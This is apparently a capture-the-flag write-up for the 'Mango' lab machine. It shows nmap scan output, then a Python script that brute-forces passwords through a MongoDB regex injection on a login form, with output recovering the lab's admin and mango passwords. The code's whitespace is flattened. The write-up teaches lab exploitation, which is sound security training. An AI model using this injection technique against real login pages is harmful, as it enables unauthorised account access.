# Nmap 7.80 scan initiated Thu Mar 26 23:50:11 2020 as: nmap -A -oA nmap_full 10.10.10.162 Nmap scan report for 10.10.10.162 Host is up (0.031s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA) | 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA) |_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Mango | Search Base | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN | Not valid before: 2019-09-27T14:21:19 |_Not valid after: 2020-09-26T14:21:19 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=3/26%OT=22%CT=1%CU=31997%PV=Y%DS=2%DC=T%G=Y%TM=5E7D31B OS:F%P=x86_64-unknown-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A OS:)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54 OS:DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120 OS:)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+ OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A OS:=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D OS:F=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=4 OS:0%CD=S)
Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1025/tcp) HOP RTT ADDRESS 1 33.10 ms 10.10.14.1 2 33.13 ms 10.10.10.162
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Mar 26 23:50:39 2020 -- 1 IP address (1 host up) scanned in 28.40 seconds
As for many boxes, we have only a web application and a SSH server.
On port 443 (https://10.10.10.162) there is a search engine, but after a few
minutes enumerating and fuzzing manually I concluded this was a rabbit hole.
If you look carefully at the nmap results, one of the scripts discloses us a
subdomain.
The name of the box is mango, a popular NoSQL database is MongoDB, so it is
suggesting that we have to exploit a NoSQLi, definitely on the auth form.
For people who never exploited a NoSQLi vulnerability before, you can find
some payload on PayloadsAllTheThings. I contributed several time
to the NoSQLi page so I know the payload that are here.
I adapted one script to bruteforce the password of a given account.
whileTrue: for c in string.printable: if c notin ['*','+','.','?','|','&','$']: payload='username=%s&password[$regex]=^%s&login=login' % (username, password + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) if'Log in for ordering Sweet & Juicy Mango.'notin r.text or r.status_code == 302: print("Found one more char : %s" % (password+c)) password += c
Let's run it for admin user:
1 2 3 4 5 6 7 8 9 10 11 12 13
$ python bf.py Found one more char : t Found one more char : t9 Found one more char : t9K Found one more char : t9Kc Found one more char : t9KcS Found one more char : t9KcS3 Found one more char : t9KcS3> Found one more char : t9KcS3>! Found one more char : t9KcS3>!0 Found one more char : t9KcS3>!0B Found one more char : t9KcS3>!0B# Found one more char : t9KcS3>!0B#2
We can also run it for mango.
Finally we have 2 accounts:
admin / t9KcS3>!0B#2
mango / h3mXK8RhU~f{]f5H
There is even a guy that made a small
script / tool
around this so you don't have to change your script each time.
If you try to login with a accounts you will get this message:
1 2 3 4
<h1>Under Plantation</h1> <h2>Sorry for the inconvenience. We just started farming!</h2> <h3>To contact us in the meantime please email: admin@mango.htb<br /> We rarely look at our inboxes.</h3>